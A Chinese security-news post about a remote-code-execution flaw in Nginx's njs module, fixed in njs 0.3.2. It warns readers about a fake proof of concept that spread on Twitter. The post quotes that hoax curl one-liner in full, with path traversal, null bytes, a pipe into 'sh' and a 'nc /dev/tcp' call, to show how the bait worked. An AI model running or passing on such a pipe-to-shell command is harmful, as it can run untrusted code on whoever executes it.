Nginx的njs插件被爆远程代码执行漏洞,务必警惕网上假poc
njs 是 JavaScript/ECMAscript 的子集 。它实现了大部分的 JavaScript 语言的功能,没有完全遵从 ECMAScript 标准,同时抛弃了 JavaScript 比较难懂的部分。njs 不是通过 V8 引擎实现的,而是通过一个更小、能耗更低、更符合 Nginx 应用场景的小虚拟机(VM)来实现,可以理解为 Nginx 为其实现了一套自己的词法解析。
njs 是以 Nginx 插件的方式存在,名字就叫:njs 。和其他 Nginx 插件一样,我们需要重新编译 Nginx 来完成安装。
而在近日,njs插件被安全研究员Alisa Shevchenko
Nginx 也在回复中声明,ZDI-CAN-8296 was fixed in the nJS 0.3.2 release。
并附带了两个链接。
也就是下面这个github issues中提到的问题,从中也许你们可以找到一些线索去发现和构造。
https://github.com/nginx/njs/issues/131
热心网友甚至还给出了patch方法
https://github.com/nginx/njs/issues/159
由于Nginx在自2009年以来的,仅发现了大约20个漏洞,其中没有一个RCE漏洞。
因此导致此次事件的关注程度在web安全界的得到了轰炸。
甚至不亚于CVE-2019-0708的火爆程度
因此,戏精再次出现,外网一位安全研究员发布了一个POC。
然后该条推文得到了疯狂转发。
再转发得到600多量后,作者发布了一篇文章。
https://medium.com/@notdan/curl-slight-of-hand-exploit-hysteria-29a82e5851d
文章里面完全披露了他是如何构造一个假的poc从开玩笑
同时,他也解释了这条语句的含义,黑鸟还是从中学到了一些技巧,也算是感谢他这波教你做人了。
curl -gsS (link: https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00) victim.server.here/../../../%00/n…\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
除此之外,还教导了一些钓鱼的思路,也是很骚,怪不得能钓到这么多人,也是奇才。
不过恐怕,昨天的流传POC已经出现,说的就是这个玩意吧。
再次强调:目前公开渠道并未披露任何细节(除Gayhub外)。
<上期看点>
黑鸟威胁情报中心,只做最正确的情报,不传谣不信谣,欢迎扫码持续关注。
点击菜单栏,扫码加入每日更新的知识星球(原价299,现价269)